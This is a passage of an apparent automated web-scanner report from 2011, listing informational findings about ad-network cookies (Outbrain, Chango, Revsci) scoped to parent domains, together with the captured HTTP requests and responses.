Host:	http://odb.outbrain.com
Path:	/utils/ping.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae; Domain=.outbrain.com; Expires=Sun, 06-May-2012 11:38:43 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /utils/ping.html?random=0.8784565008245409 HTTP/1.1
Host: odb.outbrain.com
Proxy-Connection: keep-alive
Referer: http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae; _lvs2="uaMqgoSgWEsyZpjyGwNcoLoN1lBMsXDl/XT8eOgMJupcdCqR9LRjXrHG0R5k0w1Cmy75SN8RJIxU/gzm6hl65Q=="; _lvd2="27vfag1ZPzfDGaK+UsDEF0v9S/ktpBpl0hVg0CrIJzZ7WZ/pwAclWtc9oa67TDjH3K7ooLp1QJFKcF+HzHyRcQ=="; _rcc2="c5YqA63GvjSl+Ov6ordflA=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae; Domain=.outbrain.com; Expires=Sun, 06-May-2012 11:38:43 GMT; Path=/
Cache-Control: no-cache
Pragma: no-cache
Accept-Ranges: bytes
ETag: W/"158-1304265382000"
Last-Modified: Sun, 01 May 2011 15:56:22 GMT
Content-Type: text/html
Content-Length: 158
Date: Thu, 12 May 2011 11:38:42 GMT

<html>
   <head>
       <META HTTP-EQUIV="Cache-Control" CONTENT="no-cache">
       <META HTTP-EQUIV="Pragma" CONTENT="no-cache">
   </head>
   <body>
   </body>
</html>

13.54. http://overseebroad.d.chango.com/c/t.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://overseebroad.d.chango.com
Path:	/c/t.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

_t=0c2aede6-6bb6-11e0-8fe6-0025900a8ffe; Domain=chango.com; expires=Sun, 09 May 2021 12:01:53 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /c/t.js?partnerId=oversee-broad&domainTargeting=true&pageURL=http%3A%2F%2Fpepperhamilton.com%2F%3Fepl%3D7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kGkayibaQBF1ACAQ3Oe_AADgfwUAAECA2wgAAKo-CvBZUyZZQTE2aFpCgwAAAPA&referrerURL=http%3A%2F%2Fpepperhamilton.com%2F&q=find%20lawyers%20in%20your%20area%2CLaw%20firm%2Ccorporate%20law%2Csecurities%20law&t=%20%20pepperhamilton.com%20%20 HTTP/1.1
Host: overseebroad.d.chango.com
Proxy-Connection: keep-alive
Referer: http://pepperhamilton.com/?epl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kGkayibaQBF1ACAQ3Oe_AADgfwUAAECA2wgAAKo-CvBZUyZZQTE2aFpCgwAAAPA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ox=1; _i_st=1; _i_tm=1; _i_ab=1; _i_sl=1; _i_gid=1; _i_cw=1; _t=0c2aede6-6bb6-11e0-8fe6-0025900a8ffe; _i_pm=1

Response

HTTP/1.1 200 OK
Content-Length: 0
Server: Chango RTB Server
Etag: "da39a3ee5e6b4b0d3255bfef95601890afd80709"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/javascript
Set-Cookie: _t=0c2aede6-6bb6-11e0-8fe6-0025900a8ffe; Domain=chango.com; expires=Sun, 09 May 2021 12:01:53 GMT; Path=/
Connection: close

13.55. http://pix04.revsci.net/D08734/a1/0/0/0.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/D08734/a1/0/0/0.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF4jOhOHMMH/CFfyFZ5hBdG2vMqqLhSnJolGYsbyViGzm2jLwzYcdvSuDCX0BRE1faH6+pFVa+GWQXtDZTUlxD+4jxjaUOSiFWtaoRoWoEPzPFS/qMKOOgZxQVZZx2KCmQqCYRlyRJf87ly0DSxTUuHjFQ0X4Hi6hsBM3tptwhcQ6pKtiVzlPmT7J8YSmFCk8nGaEi8uw/pmdbUTDTCxPk3RxS+r7mTK51H+dbGZLb/kqnwYVwKVrKOpzc2O7wkmux+3qQQWO2J/PszzKC3ljESTz9399xzwtiFsZVYcKXVwxqFxDvGNQKXo0ptbR/IoxdSLmJBEm/k8mMZ4WHkJPjZT6fMEbI5g2M23AmaEQVktEetBJDbNPFWQ27V53NSmx+pbUr0pyI2ZBpEkHXsJYi7feTziLd3p9rHEXUDElkF/JDK4BDzYWVkKPFz6yF0rj48gBSTjhqU76TX+wY6WQDAsO771VDP2ZWQ68peAWlQwYgNRKVrDobMsl6Di7agpiSJECqh49MPhXgfUNp5lUgedG8SrI1FwY+H+428kgnXdAmQmN7meRbdFHLSVjzHBTtsWXT5/q0gECh/yWYSya2Cs2TIFbkGCETZtyyfEwg+tWpzb+0IRvhjWHw7U+DaYa4diIYnFw06AxKeXqq5os2iI7jC3Nwf1OV6egaBTwbrJMZV+YVqL6TCiQG/Ma7cvYoHyjMK/GORsYUSnGWb/7Qya7gaNIaWZhJB3LxWvWTaSypA8xdHhg+e92kAdckvfreKjwNhZ3lgBC+XuGOtuJj6dxjPWryrjN2phQuTcOO/r6vGfLN8Z67irPcUn4=; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:38:29 GMT; Path=/
udm_0=MLv39DMJZjprpr6vNwncqcAhdFtCsylMowYZxUW6MEqE8x+80+EqavgLMisVIcRzxwED7xvBKcptbVAK4xFQ4O9EOqJvQebjGkd2HvREU0eLo2l7yxWL/0MG7WVevK0RZx2HhKkOoO/XXE0cn0xNxLLlkMLrRCuXSNgvzgl00hTJygH5vsQF9AIe7nxcFEHzq7J/ryTDvo60kEZzCwnaQ0K70d/Z6I1egvMVrmMOud14+0L4jK9oliS4SVIfi71WWS8QsvOLa3LHEp84tDqtc0KZ44av7FUHoA3KYXKF4bQvZX91+OzSuIx7Q+J/QUhIRsYvfps2p/P6fS9etpeWLdX3rRKbUPuBZaZdj7skNQ15/D05elgQRnXEUzcQesr4WlTSulpp1g1S9A/ay9O64ZCeHlgo/svVsg3sSflpCjO0+VFkIgHH36fXHR/aZUE4HpuZ7n74F47alyR3ggNzAA0dPLqubl8Pn8TZMeLhYqQqbqmNUM4TohYzNF1DylgdgKvJuKxZjRR3qW4Gs/idOi7ARur7BPiVmF0JgNykm5IeTF+JRxN5G8nb6JAcLm/3MT6DMb2aLTWGlEHB9OkKhN07Vg2CZMZyV3yj8AorBW6bIfFUAQaz86cBNVGw/brB482dcIcOSlDYj3R32G+Ri28jIeWo/aR8B4xOXjdvf43/jW5cG5IH+hCJU5BQRHMzeeDdribF2+cARePUDtezFyfvdsc1iatfVpH/+cq/6Iul6LmWpPrzCvxlo9THyXVf5SG33hrt8XqL7ZnRMKBonqXmubW8M0ERWmtvGAQJNvz3lbipQCdUr6h2evlj27/0o48V+FAPidP+kH6h08/TkrLE/ur2N5yWnT1jtElH3zKztgH1EmbiGo24I/283980L9f8diGrjPBHRBgP9SI3NCxPMjl/GwfwC22/uVYjbYHKIWKTKFIYlMo+1SeLUK2bmWApwgMuJwRJ/m7douMd0hlDBrnCXNfB9cjD1t/uY+0qm6tIBRial6QVcIh8V2ciyzaolzSBlGDfS067/wO3x3dEOpUry6h5s6RphjURwfJ2bFA449MZKAomjZzrv3AsLF62qnG4qcCi0AFUP7eQzbEADdigA+t4OGhMSbnIyWoTEIvYXedCYhW8HTFUnonIR2Jv4s/RTiVTeQhADvv955scv/Jor+u4QOFIEt0gA+vRV1qqwJfXlFkY2do4ur8K07HLd2hjiWcu08/Tulsiemrs+lzG6UQZFwQfv7yQNALTotsmh8f7IqfQfMRJV6KZBLwB/MoqWhMGup467JVSqX3GjsA1VpYWFz+El0zXZiEyN+2ywpq3YGOP1cfNxWlj2M/wq/9ZSsTIyY76aftTwaM8IGrmlEgJQMTZtE2QMA7QrJ+JpqcGPH4kRyM1nDxUiq0iL2I3AO6O2dJ7PlPozN7AtzHIQE2+8Ekgy2718eMT9PcTfTb+40qzKGhfUGl0FMWGIUeXKwEF0RgFA7YyDrwe0I8muicTwKm2mlOa5Pnv2iWMkF9zjk//hL6AiqD1RYSlrusb2Imme66VfjuOoD8=; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:38:29 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /D08734/a1/0/0/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Fgoogle.com%252F0.gif%253Fid%253DCAESEIuMZ7FlTxCZ1EPDlWZ8EFI&cver=1 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4decfa31&2&10433,10524&4dc75824&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4decfa40&1&10009&4dc75095&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4decfa7c&0&&4dc76015&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dee240a&0&&4dc8b573&271d956a153787d6fee9112e9c6a9326; NETSEGS_J09847=bff01c00ddc153c5&J09847&0&4dee247a&0&&4dc8a2b6&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4def8d7d&5&10011,10030,10070,50085,50150&4dc8d181&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4def8f97&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dc8d904&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4def8f9d&1&10592&4dca02d1&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4def8fc2&0&&4dc9f632&271d956a153787d6fee9112e9c6a9326; NETSEGS_J07717=bff01c00ddc153c5&J07717&0&4df0a86e&0&&4dcb3d30&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4df0a87c&0&&4dca5d68&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4df0b07e&0&&4dca8ab1&271d956a153787d6fee9112e9c6a9326; udm_0=MLv39C8JZjpr557JwHIRxa5jdQTtJkLnfaG2qg26ZB+wNcQAqiLCTArLHxzvFq5u+Lz+XYjpAOoQ3aXCaMwHVm5cOqJ/d0MlRvTibudFpMUy2dKvpoh2P1mo4DwSF+J5ify/opKpgIxdjs+cX7AMJNbmkATqRCOXSBhPjm35XiawTtcNGQ5TJTiyxPEjXmxThYMLjriRmFvX70E3qN+4fQApOrjujKnAezgCnqbkesD3qtu7yg1H6t/ZCZjuqzbWj5lhOPrgUkFqFOsR5PZJAHdlKcx36ghEs5TWYHJ7Hb5xhWh0E2l5fLBFFP9WPKwWobSjkhpMDi+Kp1AIHk641P8IlIrWomP6IcaKegywe6Owy1lDPNerTKWUsO8YrjXR5olzyy6wLXb6gGqI3omVUL7fPu++A+wGAueB+FZJSxpjEvAreK7XIBTbcuoepx7qL5iMjyaXf9oM3XBiaEFzMNfE0EZUNyI851k2V1WfrejH4WhOwF/zC5Qx1MY4y6GGgNgNnM6HD7V0uycF+LhqJykGY4YcHQb969KlSx75jpXGB/Y/ThqH6llUenum15V8qhTvK/opGkRWSfypvacJFo/PisZ7zXvuoJPtRRvXdS91YPPi/PBgeOZkud3dhFAVymyT7s9aCy71tzZKcb+WKzUOfzdMURGelSLRiHB4XNxnJXS3aqrXBYAsmSu6iffgdJbwMaQekImLZY2TpMIEMIOwOVqRjv2KFv/fX3qS+FWOr2FXXkZjHTVFk5x0LCjJvfrRTvguz3DQbRk3HqOXmqZLJ5j/TXB5bo/MUYug8GlJm7j6TV56dmytyVVvb57ptvBNIgIwn6gR0mAdauLi+ddLwer1QnY/bDEfG507iGGrWyey/94fKyf08GlPmrwfeCUoafeWMYYsJtm/eyN5qIcmcZJeABqdn/9AcMC6mzYb4PGeNu/dr6gt21ABJDq7eJuaFP/RsBfVywN1CTWacnW9m/q5EM9J5MXRoLvnNM9IpaiCzJ8bs79erS+p9F5OJhHllfV8eWdDTtXvA9CnZalLPrGmqw4k9zwZNx0B1clOEPwH5yAlBM4opzlyVEoCF41x7KJj1/ZcwMyTwixt9Mb5iwRRiknHNgfkPDAzchcRdUulOpcg3ATua/3S7CAqTorLhCI6dYrWicgZcOEovUJIdhOG6gYyHef9Ru9lEst4DOzCXkT4zpeT1AyLuQ9Z99q9RBqO9+6yHMAVu5Ordcpplfmw84Ma1JYivS7vq1attqs5EJ7InICNPhTee28EyNp+84w1gvdN25jlYD98oAIdyzgUvUZuGspBPijyfewcj8G0XYzVD2dP1+fV/2/h1ge05Wg9JZ3wAItavV83LWV6mgBqCi29FCEmC1i2znwJzJao4Xeu3lR6It7bRRkLGkctRzQtZZJTMOfSZMCxUakuD0y1LkFwOmg3fVWDcLwE9WJY9rH2QYSk8UOjOZ+l4HB94xgHkRRAb3s2CmWW+sMtGsDM6ZEwDsT+AJZk36vciN7xsCmB7sJEYxcBeN70Q+53oATqe9cGbyzmI5FwovuwZA==; rsiPus_qbvO="MLsXrrEOpxpv55DW8tahZ2a57v4BlC60cICOgIfdHU7gwI+bhP0TqX40neBrVzd04YF7hotNL+h4vvc66tVVUjceSeakCP8FKl+7vpw/cPKd8tMu3PMCPoyxK8+ZjwDWyB3QMrpomCL0QiC5Kvy/YgnB8KTN7G9dLpnN5M3RK+PP1zwMehHWmM2JccWRv5ZmhNfQmN/YDBU94E+biCIoa0pKkv2eA2x+zJ1SCIL380rO+L9Lk2iLRCLsePDloY4CaZKvkWcnHN4spMzHQnUA9nMhOsrooPww0kmF/1pBhtUOQIGwwBNshy3r9jL9DmeVgwo+si4cw2GLg+UiObBCYgDoqFuF17tgWtie8ndkcM4/dxQZHmAVAFp6Cd4+NKEDE1ApHgzdWMCRN3mtXvTF3dagjo97ZcxX3TK0H5gNZL/tX25K+rZRwN8wPyK9oLx40INCM6m5859n+iEwb4c3uHEIWIExaGsanUSO3meucYKt8SqtiIB1ZKfcV2EWnE5l0JI9ym05H0J1D++1YxD2YWIf3FMp0ODLJXHC5LJl8HAXM9kRR0eUwpIWZ43I4Sxu/ghMwCqycSGD5P5qCz+NfB7cpFNnCm/MZxXAtHhkwlvld7DwvFMTxzkmteonO6+tWDCvSgxfKLeBCsnh7/g2pdMlW86tZQUhX+5vIkdTKTAbn/ygJRg0T3sdyAIGgf6VindVNH18jDokISc3IGyw/B24wJC4km6cNzLCqq3zgXP3vffJqf4px62L8VMyvj3CaMObL1w9lE2lhd4iKvN3GccP1FcTweH5kHDsZZBw7FHK1W7K9ytiQtKzGQRCBtx0rurYuoXmj+tBMHYIGgQGQbpACUKiwMwgO11XDJXNsqWXOeTs409iMvRAAhFR3MmxY/Ai8JtqiI6b0Q1+g1WTMqPGi0honF4/t46uL9iK78Kt/amFrG5zPGbmiPmMFkLKl9wLroTlxm+6qkNbYbThc0/QKEKH9b1zlGLxfdlc3hqznACvxpp0ybDR66WjOYSYr5GJsa1Cu2wcBHbKR1AxsYBzoLba+u6l87gczye8xuTrYhFfwlnHydy7IYalgPJBk32vZgWW2CXqypZtqnwMKkA2NoSDvvRLOZsd5s2E5nriVmz0A020hMNet6ezR0BbsbFJkikbhD25+D5hxe38KqYGvD586gb8nEzI0j5isfTJ/lkLrhbQFBZeshLI9NVhvhrxY3ujvMVlKz2TG/zsc7BVzk9fFPtT7mgROfudWRI+VvwrnXNE2vCSQzOJZeEAKPJctLVBCeeH5f0I+bMVOeVLPDBFeBnbAN+UOthqW+XB3wOga/8nLvsjoupDcwH+hneOk/D89Naxn/NKF3MEN04OWc1SJ6wrzqU6VhG4EvS+Zv+fJ8Gt98W7PtFLVLD0oQ=="; rsi_us_1000000="pUMV4ylDPxYY7RUCt3RYS68XU2Z/uOqvJR0SNgYO9rFAJiyyAu+FxS1Z30ODwyEFcoEx3T1Eetffz3Mf20XkwCrwYFLZZJxtyzGTJat2XTjlIN8P+hQPSL5K9zsL+kusRTvgKYlhihBhqZKK6GKen73oVAV9BWGkbl//D/fTGMFsID28cq6D7duOtAY3S7ThixmzbEOMxOHaa0VO3cDkKGVKS9qitOaUYlvgkLY1MKDOtODLrFUkILMlSRpCe7+47YCa4Yvgfmntw+kxPheKq6wDe8Fd8gOqjo+YsYcbcBetJ/UlUtydzNb+VQfdT8dEj/2h41IZ5vmY/5vsAZW1gUJs43Y9iklV1tAb9jY/G3Rk4zy39xByfOtBbqnZZm8zU97WhpjXwdwTrCSEuJ4CNdY/fhO3f+aPVPTKG9RnYRL0QJ4kFGhThODFPtf76e2qY1SQ9slSHrnY01CTJTrHMxySjJKQAVAr1obI8ilzYsPlaT1OSvYVS9TK9PoGrO5Jx5bXw/zwwE6Wrxwt7KjBiQjMb8pc2/6daLQ71r2XwEeaREz3clc3XYbmXIZKYmXXjpSqe6jB0kwcSkFst/ViDZpkDsFltV4ci5YQ/eJMqmyKrF/0uup6pq93xJKQibeBPvkCxBjBIGLPE6+meOzdSPUPxAyoXPah9kyi7C70w/Ic06E82HDgxMfptenJH+QxMcJPPGsyFAVT+6SBuOjuKJ5KYDNUBXyxL2dg7B2oqDAiqh1W+megWtR3XoJXxE+b3k70BKlvT5YvEuZ0/RALqrZKe/52guDCx1yv8IEqB3NuIb5M9E0P1eLplz4HhYGMt1XJa6PPDxd4ljqvSFEQClJtagh9UzDEFg6Cb5LdDadrKiwtHRl62r3F/lJB8Wq3syJAxzEPLO4bM0VnXvq5faJnoE+6gBD5yjyVDaOWRfQzLGIWkNHa+f2KJvAyTQlC4oHYQZOGM/cVc3WrnRQmj1KDwCk/46Dq6gu9fFpETdaKz7DpE5AVcVASeUiRu6t0E9gdbxRFlQnHfQxlj0O0yv/8sVDJfLtBv7VEv6KvS85d/vyrS+3/lJtowlLX877yZqlnDrYhsgIzJ/B2kGU/Y2tWcJtJNzrSLvL6uC6zAE3YCN+2b8ZfetlvToWWUxLm+kOAX5sNQa84+z+Y7BiXKA28ArWYuR2BzhZYqV+lNsl8IuYWHrQEhBevE6yTgfXBfZ5ZWDuef3muciM4uxq9eRevsktzwd4ZolhUro4q9RDXzP+z/Jt3SlkekF3F1UyZn5rEt9sK3VhPrPz7bFs0pGO/fShWwUhEJGkkGofDmr7oO9xVS0wlWlGR+HiZLLiNXtFztdl/InifBdzZrv7tEgPT/Ekl1qqx4lzM76Hls1fjGRalSthbIGWedXoj3t9T64fqUJnYWdom7ygUV4OI6Uek4g2aJV2sE2HBrV7ibQMfkHW6H2qlf/AvGzXk5juIW8AOsU6N3bJugxzerwleYqkN4SEXHO2TsUUB2Hii30ULmVN5KVwl4AT7t07WbQfIgUgh+J4zgAJSZ1//mvY7cAo2t7r+WZ+3UqK9EVFlB88NDlOgh4Jm3SdKvwyEx2VIxC8FQZezWpUIHfmHUohseSJ3s3QYI0FyZt+UimHMdHcAt0unq75eibm7XCXgvJjZ8QEa2uTso9gthoSRwjtm4zJD8KuDs9Dol9dL10gwkePtd9XjMMl1IiMfHEGPMzYrTXatfWNnptioKHatYztwbz3JzwC1e1SaBMwSq2wE51biaKnVTIX7gjw1dfMUEcH+SSwe4EKfaZDW3Y8jNtoFzFv7v+gK3Q=="; rsi_segs_1000000=pUPF4k+huAIMDjaxs0YFwqim7poa4ScLEaYNkX2Il9r5vw/ZUtic6iMmqlK+Gc3/wmez4cWl/4CjoDXBEVZTPujvq7/LpfNWHHtwsDOKN6jONT3m1PjCJeC4D1R1f1Wo3AVgkUURjyRJ8/8jy0L0VmaL6x/19RP7nfUUQNlYs+8lmMdpx8TwiWCstdAPmF2D2z3B1ys59tzmguejXR6hZmrFnsPYqUUmczwYbgH+caWsKqyzFTcmFfzMJ60ONBbzRsOGfwCa751dJRmCy0arW/87Y6NqTlbtN/Z0fo0rOSSfj4RbJ8p59z6fTxTA4KWjfuOwi41Y8bpfT13AwTg/xS6fGGaGXCqf+QOAtKY0kQUHYjvCmbYXkfZxh58f1sGibtqxbZbqD73vO5wK3s7QRfZ6bcxFD5N/YFAuRgDLt7JFmS3yEbJmBw3817CE6dW/DQojTYHYO0laHw8HYSOjWwZm/cleWCHNL0tlSyqSYnX6EITNF+fN34XT57aalc9J/FviSOSm8SsVivWsYFpx8vT4L/OfwjhjeFTcU5B42WoFgHS69QFu9Hu3XEOQ6IT6xsf/x8WRUo+QDg5e4dFtmWON8uzeEOVIDv8p1+f6biKixT70/WJyi1Xn1Al7coho1n5F9LVQ6mVCX6FSAk9tn2OhjbzZZd1NXc9y3g0YNYo1i2W1zmWakde3xRDDxXUGGQ1HOodD58tETXU1I4ZKb6Y6ea2QJtkXG8dAlsunv38vSbem7q/JGk3RBRoUPXOmW42tsOgObBSq1soz3oRXmEbzXXn7dL0D0gJpJnxJJ8hUBeH4FGr1R918Cuw=; rtc_7N2M=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; NETSEGS_E05510=bff01c00ddc153c5&E05510&0&4df0b096&0&&4dc9f625&271d956a153787d6fee9112e9c6a9326

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
